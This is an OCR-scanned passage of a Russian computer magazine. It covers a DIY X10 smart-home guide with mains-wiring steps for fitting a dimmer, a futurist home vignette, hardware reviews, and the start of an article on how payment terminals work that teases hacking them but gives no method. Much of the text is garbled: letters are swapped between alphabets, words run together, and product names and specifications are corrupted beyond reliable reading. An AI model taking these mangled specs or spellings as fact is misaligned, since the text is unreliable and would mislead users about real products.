Фантастические фильмы с рассказами о недалеком будущем... Сногсшибательные япон- 
ские роботы, которые уже сейчас поражают своими умениями. . . Всепоглощающее рас- 
пространение интернета... Все это настолько будоражит мозг, что в голове невольно по- 
является картина идеального дома, где нет места для бытовых проблем, где все делается 
за тебя! Причем эта картина кажется настолько реалистичной, что всерьез начинаешь 
задумываться, что все это возможно уже сейчас. Постой, так ведь и вправду возможно! 

И чтобы построить свое высокотехнологичное жилище, совсем не обязательно иметь 
кучу наличных средств! 
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О Как это будет 

Что такое, в твоем понимании, комфортный дом? Хороший 
ремонт, удобная мебель и продвинутая техника? А можно ли 
сделать что-то, для того чтобы в доме стало еще комфортнее 
и уютнее? Конечно! Ведь дом можетбыть нетолько конфор- 
тным, но еще и умным! Сейчас я проведу тебя по своему 
жилищу — иты поймешь, о чем речь. Но помни, что все это 
лишь моя фантазия. Утебя самого, наверняка, появится 
масса собственных идей. Я, как Морфеус из «Матрицы», могу 
лишь указать путь — дорогу ты найдешь сам :). 

Начнем. Мы заходим в ванную комнату и видим кран с душем. 
Сразуже вспоминается выходной день и веете «приятные» 
ощущения, связанные с постоянными перепадами темпе- 
ратуры воды. Не мириться же с этим, но что делать? Можно, 
конечно, поставить насос, тем самым наладив постоянный 
напор воды. Но готов ли ты столкнуться с бурей негодования 
всехтвоих соседей по подъезду, у которых ты таким образом 
отнимешь воду? Да и как-то не по совести получается. Гораз- 
до приятнее во всех отношениях вопрос решается установ- 
кой специального смесителя стермостатом, который нередко 
встречается в душевых хорош их спортивных комплексов. 
Хитрое приспособление автоматически меняет баланс 
между горячей и холодной водой, чем обеспечивает мини- 
мальное отклонение отзаданнойтемпературы. Терпеливо 
увеличивать напорто горячей, то холодной воды, естествен- 
но, можешь иты, нотутзатебя все делаетаппарат! 

Устроен он относительно просто. Описанный эффект дости- 
гается благодаря специальной пластике, которая изменяет 
свою форму под воздействием температуры жидкости, и 
специального клапана, обеспечивающего подачу нужного 
количества горячей воды. Оттебя требуется только выста- 
витьжелаемую температуру и напор. 

Впрочем, на этом наштюнинг ванной не заканчивается. 
Снимаем бестолковую вентиляционную решетку и устанав- 
ливаем на ее место подходящий по размеру вытяжной венти- 
лятор с гигростатом. Гигростат — это такой девайс, который 
включает вентилятор в случае, если влажность в ванной 
комнате становится больше заданного уровня. Отнынеты 
забудешь про повышенную влажность и связанный с ней 
дискомфорт. 

А как же туалет? Я уже вижу, как уста на вливаю здесь 
вытяжной вентилятор, выключающийся через некоторое 
время с помощью встроенного таймера. Конечно, ты могбы 
поставить обычный, тупой вентилятор, но это не самый опти- 
мальный вариант. В этом случае он включался и выключался 
бы вместе со светом и потому не осуществлял бы должного 
проветривания. Не очень круто и оставлять его постоянно 
включенным, напрасно переводя электроэнергию. Впрочем, 
если утебя уже стоитобычный вентилятор, нет повода 
вешатьнос. За счетхитрой технологии XI 0 (о которой мы 
подробно рассказали в прошлом номере) можно заставить 
плясать под твою дудку любой электроприбор, но об этом чуть 
позже. 

Сейчас лучше вспомни о потопе — одной из самых страшных 
неприятностей, которые только могут приключиться в 
квартире. По идее, в наше время при медныхтрубахэто нам 
грозить не должно, но слабым местом в системе оказыва- 
ются гибкие подводки до бочка и до смесителя на кухне. В 
них со временем истончаются прокладки или выгнивают 
латунные соединения. Ктомуже бойлер с неподключенным 



к канализации предохранительным клапаном в один 
прекрасный день может взять да и слить не один литр воды. 
Чтобы избавиться от дурных предчувствий, поставим систе- 
му, которая отключит воду в случае протечки. Для этого надо, 
во-первых, поменять вводные клапаны на клапаны с элект- 
роприводом, во-вторых, в местах потенциальной опасности 
прикрепить к полу датчики воды, в-третьих, присоединить 
датчики и приводы кспециальному контроллеру, который 
немедленно закроет клапаны, кактолько на один из датчи- 
ков подастся тревожный сигнал. В довесок можно поставить 
небольшой девайс, который сообщиттебе о произошед- 
шем згшб’кой. В каждом доме есть места, где освещение 
необходимо лишь короткое время: взять хотя бы коридор и 
прихожую. Было бы здорово, если бы свет включался как раз 
втот момент, когда ты открываешь дверь и входишь в кварти- 
ру, и автоматически гас после того, какты разделся, разулся 
и прошел в свою комнату. Это вдвойне приятно, еслиты 
пришел домой с тяжелыми сумками и занимаешься ерундой, 
шаря по стене в поисках «этого дурацкого выключателя». 
Воплотить в жизньэту полезную фишку несложно, нужно 
лишь поставить датчики движения, которые срабатывают, 
когда вокруг них меняется обстановка (появляется человек). 
Ты, наверняка, видел подобные штуки в банках и магазинах: 
вспомни охранные датчики, расставленные поуглам и свер- 
кающие красным светодиодом каждый раз, когда в ихзоне 
начинается движение. Тут примерно то же самое. Датчики 
движения различаются по дизайну, типуустановки, макси- 
мальной мощности включаемых ламп, а также по углу охва- 
тываемого пространства. Тут есть два подходящих варианта. 
Идеальный — это обычный выключатель, совмещенный с 
датчиком движения, потому как, наряду с автоматической 
работой, он решает проблему ручного включения, на случай 
если датчик по какой-то причине забарахлит и перестанет 
функционировать. Но, увы, такие комбо-девайсы либо очень 
дороги, либо же имеют форму, характерную для азиатских 
стран (прямоугольник, не влезающий в обычное монтажное 
отверстие без перфоратора). Поэтому лучше остановиться на 
датчиках движения на батарейках. Сигнал о включении они 
передают по радиоканалу, так что повеситьтакие датчики 
можно где угодно. Для защиты ламп от перегорания из-за 
частого включения нелишне будет дополнительно устано- 
вить устройство плавного зажигания. 

Продолжаятему освещения, переходим в комнатустелевизором. 
Первое, что мы делаем, — это демонтируем старый совковый 
выключатель и на его место устанавливаем свеженький диммер 
суправлением от пульта ДУ. Диммер — это устройство, позволяю- 
щее регулировать яркость свечения ламп. Теперь, лежа надива- 
не, с помощью пульта можно нетолько включить или выключить 
свет (хотя и это уже приятно!), но еще и максимально подогнать 
уровеньосвещения под свои нужды: для чтения, релаксации 
или, например, создания интимной обстановки. 

Далее следуем на кухню, где будем автоматизировать 
электрочайник. Вынимаем его вилку из розетки и вставляем 
обратно, ноуже через релейный модуль, позволяющий по 
команде включать или выключать подсоединенный девайс. 
Но кто будет давать команду? Очень просто — электронный 
таймер, автоматически зажигающий нам освещение, когда 
мы просыпаемся. Программируем его на включение чайника 
на 1 0 минут позже. Пока мы встаем и умываемся, у нас кипя- 
тится вода! Лепота! 



т 

> Выражаем 
благодарность за 
предоставленные 
устройства интер- 
нет-магазинѵ ѵѵѵѵѵѵ. 
тадісЬоте.ги . Про 
протокол ХіОты 
можешь прочитать в 
мартовском номере 
«Хакера» или на 

са йте ѵѵѵѵѵѵ.хІО.ги. 

? 

> Будь внимателен 
при установке этой 
системы. Помни, 
чтоты работаешь с 
достаточно высоким 
напряжением, 
которое опасно для 
жизни! Перед тем как 
лезть в оголенные 
провода, удосто- 
верься в отсутствии 
напряжения. 
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>Устанавливаем диммер 




Останавливаем клавишу >3авинчиваем распорные винты 



«Не стоит сразу рваться 
в магазин и закупаться 
кучей модулей для всей 
квартиры, судорожно под- 
считывая растущее коли- 
чество потраченных денег» 



> Перемычка 
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□ От теории к практике 

Выглядит все красиво, но сколько стоит 
подобноеудовольствие? Бытует мнение, что 
хозяевам оно обходится в целую кучу денег, 
поэтому позволить его себе могут исключитель- 
но богатые люди. Это нетак! Чтобы развеять 
все сомнения, я расскажутебе, каксоорудить 
свой собственный умный дом с минимальными 
капиталовложениями. В прошлом номере была 
рассмотрена система Х10, принципы ее работы 
и взлома. Попробуемже теперь извлечь из нее 
толки построить свой интеллектуальный дом на 
основе протокола XI 0. Для наглядности возьмем 
типичную квартиру в панельном девятиэтажном 
доме, в котором живуттысячи наших читателей. 
Для начала распишем план, что и где будем 
ставить. Итак, смотрим на планировку квар- 
тиры (кстати, планировку практически любой 
квартиры легко можно найти в интернете). Под 
все световые выключатели мы устанавливаем 
диммерные модули. Каждый такой модуль стоит 
около $50. За эти деньги постепенно может 
превратить свою конуру в жилище XXI века даже 
небогатый студент, прикупая по паре модулей 
в месяц (осталась самая малость — найти эту 
самую конуру — примечание зловредного 
Эіер’а, которому нередко приходится ночевать 
в офисе). Далее назначаем каждому модулю 
свой уникальный адрес, по которому мы сможем 
обращаться с пульта и управлять всем освеще- 
нием сразу. Можно, например, регулировать 
яркость освещения или одной кнопкой вклю- 
чать/выключать свет во всей квартире. 
Поскольку коридору нас — самоетемное место в 
квартире и иногда оченьхочется, чтобы свет в нем 
включался автоматически, попробуем это реали- 
зовать (хотя, если живешь с родителями, пожалуй, 
лучше этого не делать, чтобы не выдавать себя, 
возвращаясь невесть когда с гулянки). Для этого мы 
поставим в каком-нибудь неприметном месте ра- 
д и одатч икдвижения, кото р ы й будет отп ра в л ять н а 
трансивер команду включения освещения, напри- 
мер, через минуту после обнаружения движения. 
Перейдем к ванной комнате и туалету. Чтобы 
исключить опасность протечек, ставим на полу 
датчики воды и врезаем втрубы магнитные 
клапаны. Для этих целей существуют уже гото- 
вые наборы, но ихустановку лучше возложить 
на плечи бывалых сантехников. Благодаря 
этим клапанам ты можешь сделать так, чтобы к 
твоему приходу домой ванна уже была напол- 
нена и тебе оставалось бы только раздеться и 
с радостью принять ее. Только представь: ты 
едешь домой, прикидываешь время прибытия и 
посылаешьБглз’ку с командой наполнить ванну. 
Клапаны автоматически включатся — и ванна 
начнет наполняться. Датчики уровня воды не 
дадут ей перелиться через край — кактолько 
будет достигнут нужный уровень, они скоманду- 
ют отключить подачу воды. 



Теперь окна. Существуют системы управления 
жалюзи или ставнями. На улице ставится датчик 
освещенности, и когда становится слишком 
темно/светло, шторы закрываются. Самое 
приятное, что все это можетуправляться не 
только автоматически, но и, например, с пульта, 
компьютера илитаймера. 

О Быстрый старт 

Не стоитсразу рваться в магазин и закупаться 
кучей модулей для всей квартиры, судорожно 
подсчитывая растущее количество потрачен- 
ныхденег. Имеетсмысл начинать с небольшого 
стартового набора, состоящего из пары дим- 
меров, трансивера, универсального пульта и 
выключателя типа звонка. Такой комплекттебе 
обойдется всего в $200. Потратив часок-другой 
на установку его в двух комнатах, ты сможешь 
сразу оценить прелести выключения или 
регулировки света, лежа с подругой на диване. 
Затем можно постепенно докупать диммерные и 
релейные модули, устанавливая их в остальных 
частях квартиры, и таким образом постепенно 
строить свой умный дом. Следующей обяза- 
тельной покупкой должен стать универсальный 
таймер, который будет будить тебя, включать 
свети музыку, электрический чайник, отдавать 
команду для набора воды — словом, делать все, 
на что только хватиттвоей фантазии. В перс- 
пективе можно докупить систему управления 
жалюзи, магнитные клапаны и подключаемый к 
компьютеру модуль СМ 1 1 , с помощью которого 
ты сможешь писать макросы и даже программы 
для управления своим домом, например, через 
интернет. 

□ Инсталляция 

Рассмотрим установку системы для управле- 
ния люстрой. Нам понадобится: монтажный 
короб (круглый пластиковый ободок, который 
вставляется в гнездо розетки или выключателя), 
диммерный модуль, выключательтипа кнопки 
(смотри картинку), набор отверток и индикатор 
фазы. Первое, что нужно сделать, — это обезо- 
паситьсебя, отключив электричество. Сначала 
выруби в щитке рубильник, отвечающий за 
верхний свет, а потом, для верности, проверь 
наличие напряжениятестером. Говорютебе на 
полном серьезе: если на это положить, то легко 
может получиться так, что в умном доме жить 
будет некому. На фиг намтакие перспективы, 
правда? 

Далее нужно вытащитьустановленный выклю- 
чатель. В моем случае, чтобы снять отечествен- 
ный девайс, пришлось нажать сбоку специ- 
альную пипку, отсоединить кнопку и вывинтить 
пару винтиков. Клюстре идет два провода: фаза 
и ноль. Но в старыхтиповых домах непосредс- 
твенно к выключателю подведена только фаза: 
он ее разрывает и после выключателя она идет 



дальше клюстре. В подобном случае мы не 
можем установить релейный модуль. Впрочем, 
зная о проблемах нашей совковой проводки, 
производители заранее предусмотрели подоб- 
ный варианти выпустили диммерный модуль, 
легко подключаемый без нуля сети. 

Так и сделаем! Для этого аккуратно вытаскива- 
ем провода и отсоединяем старый выключатель, 
следя затем, чтобы оголенных проводов ничего 
не касалось, а младший брат/сестренка/домаш- 
нееживотное не решили с ними поиграть. Все 
потому, что нам ненадолго придется подать на 
них напряжение, чтобы определить, какой же из 
этих проводов все-таки является фазой, а какой 
просто идет к люстре. Дотронься индикаторной 
отверткой сначала до одного провода, потом до 
другого — и фаза будетлегко определена. Чуть 
более сложно это делается с помощью мульти- 
метра. Теперь аккуратно, чтобы не попасть под 
напряжение, помечаем фазный провод (можно 
просто налепить на него кусочек изоленты), 
отключаем верхнее электропитание и продол- 
жаем заниматься монтажом. 

Далее нам необходимо подготовить мон- 
тажную коробку. Загвоздка в том, что у меня 
такая коробка в приспособленное для нее 
крепление вставляться просто так не захо- 
тела. И засунуть ее туда удалось только чуть 
подрезанной. Надеюсь, утебя все пройдет 
удачнее, и ты сразу сможешь приступить к 
следующему этапу, на котором в монтажную ко- 
робку необходимо продеть провода. Для этих 
целей в коробке предусмотрены специальные 
заглушки. Выламывай наиболее подходящую 
из них или же вообще все, чтобы обеспечить 
лучшее охлаждение для будущих девайсов. 
Теперь вставляем провода в предусмотренные 
клеммы диммера, строго следуя пометкам 
«фаза» и «ноль». После этого устанавливаем 
перемычку между клеммой «І\І» на диммере и 
проводом, уходящим на люстру. 

Очередьзатак называемым фильтром. Раз 
уж мы подключали диммер без нуля сети, 
придется позаботиться, чтобы команды XI 0 не 
глушились сопротивлением люстры, а для этого 
нужно сделать обходной путь. Вспомним, что 
команды имеют высокочастотную составляю- 
щую (120 кГц), для них намеренно вставленный 
конденсатор будет прозрачен. Втоже время для 
частоты сети (50 Гц) он будет иметь достаточно 
высокое сопротивление. Это и есть принцип 
действия фильтра, включенного в комплектлю- 
бого диммера. Его нужно установить параллель- 
но люстре, желательно в месте ее крепления. В 
этом месте должен быть клеммник, используе- 
мый для удобного соединения спрятанной в сте- 
нахпроводки с проводами люстры. Он какраз 
идеально подходит для монтажа фильтра. 
Возвращаемся к диммеру. К нему нужно 
подсоединить наш звонковый выключатель 
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Фаза — провод, по которому потребителю подается ток от источника. Он 
всегда находится под напряжением, поэтому, когда ты касаешься индика- 
торной отверткой фазного проводника, загорается лампочка и через тебя 
течет небольшой ток. 

Ноль — этот провод без напряжения (говоря умными словами, он имеет 
нулевой потенциал), и взятье него нечего. Получается, что в любой розет- 
ке есть и фаза, и ноль. Токтечет от фазы к нулю. 

Релейный модуль — этот де вайе ставится в цепьсустройством, которое 
необходимо только включать и выключать. Его недостаток в том, что ему 
требуется наличие в сети фазы и нуля. 

Диммерный модуль — позволяет регулировать, например, яркость осве- 
щения. Включается в цепь двумя способами, в зависимости от наличия 
или отсутствия нуля. В первом случае — параллельно нагрузке, во втором 
— последовательно ей. Это самое оптимальное решение для обычных 
советских домов, где обычно к выключателю подходит только фаза. 
Трансивер — передает команды с радиопульта в сеть 220 вольт по 
протоколуХІ 0. 

Таймер — устройство, которое позволяет в определенное время вклю- 
чать, выключать и регулировать яркость во всехустройствах, включенных 
всетьХІО. Сего помощью можно даже создавать «эффект присутствия», 
случайным образом включая и выключая свет в квартире. 
Датчикдвижения — реагируетна появление движения или изменение 
освещенности, посылая команду включения/отключения определенного 
устройства. Можнозадать время свечения, реакцию на движение или 
освещенность, а также адрес устройства, которому будет передаваться 
команда. 

СМИ — компьютерный интерфейс, позволяющий, во-первых, управлять 
модулями системы умного дома с компьютера, а во-вторых, разрабаты- 
вать сложные сценарии. Если взять библиотеки кэтому модулю, то можно 
создать свой собственный софт для управления всей системой XI 0. 
Звонковый выключатель — выключатель, который всегда разомкнут, и 
замыкается лишь во время нажатия кнопки, после которого вновь возвра- 
щается в исходное состояние. 



Останавливаем все в монтажный короб 
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так, какэто показано на схеме. Далее следует 
самый важный этап — назначение диммеру его 
индивидуального адреса, используя который, 
мы и будем рулить люстрой. Для этого мы 
неспешно и аккуратно размещаем в коробе 
провода, чтобы ничего не коротило, и снова 
подаем напряжение. Для того чтобы запрог- 
раммировать диммер, необходимо подать ему 
команду включения или выключения потому 
адресу, который мы хотим за ним закрепить. 
Команды подаются с помощью так называ- 
емого трансивера, который принимает их с 
пульта д/у и транслирует в электрическую сеть. 
Трансивер подключается клюбой свободной 
розетке, что мы, собственно, и делаем. Далее, 
чтобы начать программирование, необходимо 
перевести диммер в специальный режим, 
нажав на предусмотренную в его конструкции 
кнопочку шильцем или проволочкой. Причем 
кнопку нужно удерживать до тех пор, пока не 
загорится светодиод (если этого не происходит, 
значит, что-то ты сделал неправильно). Затем 
нажимаем на пульте адрес и кнопку включения 
(в моем случае это были кнопки «3» и «Оп»), 
После этой процедуры светодиод погаснет, 
следовательно, все — диммер зашит. Можно 
проверить, работаетли наша система, снова 
подав туже команду. Люстра должна плавно 
включиться. Есть? Есть! 

Повторим операцию программирования для 
плавной регулировки яркости. Для этого опять 
же зажимаем кнопку на диммере, ждем, пока 
загорится светодиод, указываем тотже адрес 
(третий) и жмем на кнопкуувеличения яркости. 
Таким образом мы говорим диммеру, что будем 
использовать его для регулировки яркости 
освещения. 

Ну вот мы и подошли к завершающей стадии. 
Снова отключаем верхний свет и приводим 
нашу конструкцию в законченный вид. Для 
этого аккуратно помещаем все в монтажную 
коробку: сначала диммер (смотри не обломай 
провода!), затем сам выключатель. Далее 
коробку вставляем в гнездо, завинчиваем 
распорные винты и ставим на место кнопку. 
Самое время подать напряжение и проверить, 
работаетли утебя выключатель. Однократное 
короткое нажатие включаетлюстру. После 
одного длительного нажатия начинает умень- 
шаться яркость, а после второго — увеличи- 
ваться. Теперь пульт: проверь, включается/ 
выключается ли люстра по запрограммиро- 
ванному адресу и регулируется ли ее яркость. 
Собственно, если ты все сделал правильно, в 
чем я практически не сомневаюсь, то все будет 
работать на ура. Теперьутебя есть реальная 
возможность оценить, каким ты можешь сде- 
лать свой интеллектуальный дом, имея прямые 
руки и богатую фантазию. 



□ Тихий ветер больших перемен 

Летним вечером 2018 года я подъезжаю к 
воротам своего дома на автомобиле, у которого 
урчат сразу четыре электродвигателя, для 
каждого колеса. Охранная видеокамера 
в темноте считывает номер подъехавшей 
машины и включаетсистему опознавания 
«свой-чужой». Машина правильно отвечает на 
переданный радиозапрос, и ворота распахи- 
ваются. Пока машина катится по подъездной 
дорожке, подсвеченной включившимися 
светодиодами, словно взлетная полоса 
аэродрома, мойдом, почувствовав хозяина, 
начинает неспешно оживать. Я приближаюсь 
к гаражу на расстояние в 1 0 м, и его автома- 
тические двери открываются. В это время 
сбоку сверкнули окна дома — это поднялись 
рольставни и внутри включился дежурный 
свет. Сам дом наполняется механическими 
звуками: климат-система вышла из режима 
экономии энергии и начинает вовсю работать, 
возвращая оптимальный уровень тем пера- 
туры, влажности и чистоты воздуха. На кухне 
копошится система «Электронный повар». 

Из отсеков холодильника «Гарнир», «Мясо», 
«Салат» и «Десерт» в сервировочную машину 
переместились брикеты в вакуумной упаковке; 
еда выгрузилась на тарелки с добавленными, 
согласно моему вкусу, специями, после чего 
готовые блюда переехали в камеры хранения, 
где будут находиться в холоде и тепле вплоть 
до моего появления. 

Я оставляю машину в гараже и иду к дому. 
Прикладываю палец к сканеру рядом со 
звонком — происходит идентификация ра- 
диоключа размером с пылинку, вживленного 
под кожу тыльной части ладони. Дверь приот- 
крывается. Я захожу в хорошо освещенную 
прихожую и наблюдаю, как выдвигается ящик 
с тапочками. Видно, что меня тут ждут! Став- 
лю ботинки в машину для ухода за обувью. 
Оченьудобная штука, знаешь ли: она сама 
определяет, нужна ли сушка, сама чистит от 
грязи и даже, определив цвет, сама натира- 
ет их подходящим кремом, завершая свою 
работу полировкой. Я беру дипломат и иду в 
комнату, где меня радушно встречает легкая 
джазовая мелодия (и как она только угадала, 
что я хочу послушать именно ее?). Система 
мультирум следует за мной по пятам, изменяя 
громкость ди на ми ко в -картин так, чтобы 
мой слух везде ласкала эта замечательная 
мелодия. 

Я понимаю, что спать мне совсем не хочется, 
нужно просто хорошо отдохнуть. Выбираю на 
ближайшемтерминале «Сценарии присутствия 
-> Пляж», и на плазменных панелях появляется 
изображение красочного пляжа. Вся комната тут 
же наполняется шелестом моря и пальм, а муль- 
тирум переключает интернет-радио со станции 



«Риге ^ 22 » на станцию «ОШ Еаііпо». На потолке 
загораются мощные галогеновые прожекторы, 
создавая иллюзию солнечного света; настенные 
кондиционеры начинают работать по сцена- 
рию, совместно создавая впечатление бриза, 
поддувающего то с одной стороны, то с другой. 
Ощущения настолько сильные, что кажется, как 
будто дом реально перенесли и поставили пос- 
реди прибрежных песков Гавайских островов. 

Я иду переодеваться в гардероб — система 
управления, считав радиометки одежды, 
открывает нужные шкафчики и полки, выдает 
вешалки, с которыхутром забиралась одежда. 
При попытке положить футболку на место, вдруг 
раздается тонкий писки голос сообщает: «Вещь 
требует стирки». Что, опять?! Ну ладно, хоть 
идти никуда не надо — тут же открывается отсек 
для грязной одежды. Иду ктерминалу, чтобы 
выбрать шмотки, и кликаю по категории «Лето». 
Прямо на дисплеея могу выбрать любую вещицу 
из своего гардероба, перебрать все варианты и 
оценить, какя буду выглядеть — мои анимиро- 
ванные изображения в отобранных шмотках как 
на ладони. Наконец, я выбираю то, что мне нра- 
вится, беру выехавшую одежду и иду в ванную. 
Мини-бассейн уже полон и бурлит водой, 
подсвечиваясь пульсирующими и меняющими 
цвет светодиодами. Дом точно знает, что ванна 
каждый вечер — это традиция. Я залезаю и 
нежусь: вокруг меня все также шелестят паль- 
мы и поет океан; боковым зрением замечаю 
в окнах набегающие волны и песок. Мой нос 
пленитзапах соленого берега, который на 
редкость достоверно воссоздается аромома- 
шиной. Я чувствую, что для полноты ощущений 
мне просто необходим какой-нибудь летний 
коктейль, а идти в бар конечно же не хочется. 
Поэтому я начинаю разъяснять свои желания 
в слух: «Напитки, список». Дом покорно пере- 
числяетто, что осталось в баре (когда же почи- 
нятэтого робота, который ходил в магазин?). 
Прикинув, что бы мне хотелось больше всего, я 
говорю: «Коктейль Роял Манго». Электробар- 
мен сливает послойно ингредиенты, бросает 
кубикльда в стакан струбочкой и ставит его на 
полку микролифта, который соединяет барную 
стойку на первом этаже и ванную комнату. Я 
делаю пару глотков напитка — и понимаю, что 
рай, наверное, выглядит именнотак, может, 
даже чуточку хуже... 

Итак, имея некоторые финансы, прямые руки, 
а главное, богатую фантазию, ты уже сейчас 
можешь превратить свою небольшую квартиру 
в доселе невиданный дом нового тысячелетия. 
Возможно, когда-нибудь подобные приспо- 
собления будут в порядке вещей, но сейчас им 
реально позавидует каждый. Да какая, впрочем, 
разница. Главное — то, что тебе самому жить 
станет проще и комфортнее, а это удел всех, кто 
желает идти в ногу со временем. □С 
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Педальки для профессиональных летчиков 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Тип устройства: педали для летательных симуляторов 

Интерфейс подключения: 115В 2.0 
Количество осей:3 
Разрешение по оси направления:512 
Разрешение по оси педали тормоза: 1 28 
Настройка под величину стопы: есть 
Материал: пластик 

1 . Любители авиационных симуляторов по достоинству оценятмани- 
пулятор Заііек Р235 Рго РІідЫ: РисИег Ресіаів. Управление производится 
ногами, так что остальные функции «летчики» смогут с легкостью перело- 
жить на мышь, клавиатуру и дополнительные джойстики. 

2. Управление производится потрем осям. Основная отвечаетза руль на- 
правления, а две другие — за раздельные тормоза. В принципе оси можно 
использовать по своему усмотрению, благодаря специализированному 
софту, включенному в комплект поставки. 

3. Педали сделаны из прочного пластика и при этом достаточно легкие. 
Закрепить их на полу можно с помощью двустороннего скотча. А винты 
позволят зафиксировать манипулятор намертво. 

4. В центре основания расположен массивный круглый регулятор, кото- 
рый дает возможность управлять жесткостью хода в широком диапазоне 
— достаточно повернуть ручку в нужную сторону. 

О 

1 . Педали требуют некоторого времени, чтобы к ним привыкнуть, да и 
цена для устройства такого класса слишком высока. А раздельныетормо- 
за поддерживают не все виды авиасимуляторов. 



ТЕХНИЧЕСКІЕ ХАРАКТЕРИСТИКИ: 

Тип устройства: ВІиеіооіЬ-гарнитура 

Интерфейс: ВІиеіооіЬ ѵег. 1 .2 (поддержка профилей НеабЗеІ и НапсІвРгее) 

Время в режиме разговору часы: 4-6 
Время в режиме ожидания^ часы: 80 
Вес, г: 1 0 



1 . Беспроводная гарнитура ЗаЬга 3X1 0 поставляется в небольшой 
коробке черного цвета. Девайс предназначен для работы с мобильными 
телефонами, поддерживающими ВІиеіооіЬ 1 .2. Передача звука осущест- 
вляется через гибкую дужку, которая играет роль микрофона. 

2. По рабочим характеристикам За Ьга 3X1 0 производит хорошее впечат- 
ление. Качество звука и автономность работы на высоте, и это при столь 
скромных габаритах! Благодаря системе Б5Р звук в динамиках чистый, 
без посторонних помех. 

3. Комплектация порадует любителей дополнительных бонусов и стиль- 
ных аксессуаров. Вместе с устройством покупатель получает бархатный 
мешочек с магнитной застежкой для хранения девайса, гармонирующую 
сЗабга 3X10 подставку, а также дополнительный микрофон. 

4. Приятный строгий дизайн, миниатюрные размеры и весьма скромный 
весделаютЗабгаЗХЮ одной из самых аккуратных и стильных гарнитур 
на рынке. 



1 . Если носить гарнитуру в течение продолжительного времени, ощу- 
щается некоторый дискомфорт, да и сам динамик не для каждой ушной 
раковины подойдет. 



ВІиІооІН-гарнитура для обладателей стильных мобил 









1 . Если при слове Епготы сразу представляешь себе спортивный кар, со 
вздыбленной лошадью на шильдике, то на этот раз ты ошибся. Сегодня 
под этой новой торговой маркой выпускаются компьютеры, телевизоры и 
мониторы. Именно о представителях последних мы и поговорим. 

2. Это отлично выглядящий 1 7-дюймовый монитор, выполненный втрех 
цветах — черный (передняя панель), серебряный (бока, низ и верх) и 
белый (задняя панель). 

3. Белая «филей ная» часть смотрится очень хорошо, особенно в сочета- 
нии с крышкой, прикрывающей разъемы. 

4. Разъемов чуть больше минимума — порты БѴІ и Б-ЭиЬ. 

5. Эта панель обладает довольно стандартными для семнашки характе- 
ристиками, но качество изображения у нее очень неплохое. Цвета яркие и 
насыщенные. 

6 . Впрочем, о качестве цветопередачи достаточно красноречиво говорит 
график колориметрического тестирования. 

7. Меню, несмотря на внешнюю неказистость, очень понятное и удобное 
в работе. Вдобавоконо на русском языке. Кнопки управления тоже не 
вызывают нареканий. 



1. Небольшая проблема естьтолько со скоростью отклика матрицы — все- 
таки при работе ощущается, что она великовата, несмотря на заявленные 
характеристики. Особенно хорошо это видно при скроллировании текста. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые процессоры: АМЭ АіЫоп 64 
Сокет:АМ2 

Чипсет: ІЧѴЮІА пЕогсе 590 БЕІ (КІѴЮІАС51ХЕ (ЫВ) + КІѴЮІА МСР55ХЕ (ЗВ)) 
Память: 4 хЭйРАМ БІММ порта с поддержкой до 32 Гб памяти ООР2- 
400/533/667/800 

Слоты расширения: 2 х РСІ Ехргезз хі 6, 2 х РСІ Ехргезз хі , 2 х РСІ 2.2 
Хранение данных: 2 порта РАТА 133/100/66/33 с возможностью подключе- 
ния 2-х винчестеровтипа ЮЕ, 1 х РОБ (Ріорру), 7х5АТА, 1 хе-5АТА 
Звук:8-канальный аудиокодек РеаІПек АЕС883 НідЬ ОеОпіОоп Аибіо 
Сеть: 2 х ѲідаЬіЕ ЕАЫ (контроллер Магѵеіі 88Е1 1 16 NN01) 

Дополнительно: 1 0 х 115В 2.0 портов (4 внешних и 6 внутренних), 2 х 
Рігеѵѵіге (опционально) 

Торм-срактор: ста н да ртн ы й АТХ 
Размеры^ мм: 305x244 



1 . Еще одна плата из серии экстремальных платформ от ЕС5 рассчитана 
на работу с процессорами АМБ под сокет АМ2. Разводка карты сделана 
достаточно грамотно. Слоты РСІ Ехргезз питаются от отдельного молекс- 
разъема; видеокарта и габаритный кулер не блокируют доступ к памяти и 
защелкам на БІММ. 

2. Устройство построено на основе набора логики N VI О ІА пЕогсе 590 5ЕІ, 
а значит, 2 порта РСІ Ехргезз хі 6 могут работать в ЗЕІ-режиме, при этом 
кажд ы й будет ис пол ьзо вать всеіблиний. 

3. Проблем с подключением дополнительныхустройств и контроллеров 
не возникнет, таккакв распоряжении пользователя имеется 46 линий 
РСІ Ехргезз, 32 из которых отданы на растерзание ЗЕГконфигурации. 
Дополнительные 4 канала отвечают за работу слота РСІ Ехргезз х4, а еще 
2 — за пару РСІ Ехргеззхі . 



1 . Неудобно расположен только первичный 1 0 Е-порт. К сожалению, при 
установке во второй слот карты РСІ Ехргеззхі 6 с массивным охлаждени- 
ем блокируются оба порта РСІ 2.2. 
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ИЗУЧАЕМ ПЛАТЕЖНЫЕ ТЕРМИНАЛЫ 

Сегодняшним пациентом «Инсай- 
да» стал один из платежных терми- 
млов, которых, как ты, наверное, 
успел заметить, расплодилось в 
наше время превеликое множест- 
во. Они стоят в каждом магазине, 
учреждении и метро. Наверняка, 
твой пытливый ум не раз п° с ^ала 
мысль о том, как он устроен, можно 
ли его взломать, не имея под рукой 
каких-то специальных устройств. 
Нѵчто, друг, читан новый «Ин- 
сайд», возможно, это натолкнет 
тебя на нужные мысли . . . 



Принцип работы 

Каждая компания предоставляет свои услуги. Это и оплата сотовой 
связи, и погашение кредитов, и оплата ЖКХ. Наличиетех или иных 
доступных сервисов зависит оттвоего выбора платежного терми- 
нала. Давай рассмотрим организацию работы системы. К примеру, 
нам необходимо пополнить баланс на сотовом телефоне. Мы выби- 
раем на терминале нужного нам оператора сотовой связи, вводим 
телефонный номер, скармливаем куп юроприем нику наши кровно 
заработанные денежки и жмем «Оплатить». Терминал с помощью 
ѲРР5-модема связывается с сервером и отсылаетему введенные 
данные. Обработав их, сервер посылает данные на шлюз сервера 
оператора сотовой связи. В случаеудачно проведеннойтран- 
закции твои кровные поступят на счет. В случае неудачи сервер 
сообщит об этом системному администратору, контролирующему 
работу сервера, и ошибка будетв кротчайшие сроки устранена. 

Как показывает практика, все системы имеюттенденцию ксбоям, 
поэтому, мой тебе совет, всегда сохраняй чек до поступления денег 
на твой счет. 
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(2) ОІР-переключатель 
принимаемой валюты 



(3) ОІР-переключатель 
качества проверки купюр 



> Системная плата купюроприемника 
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(8) Шлейф подключения 
сенсорных датчиков 



Функциональные части 

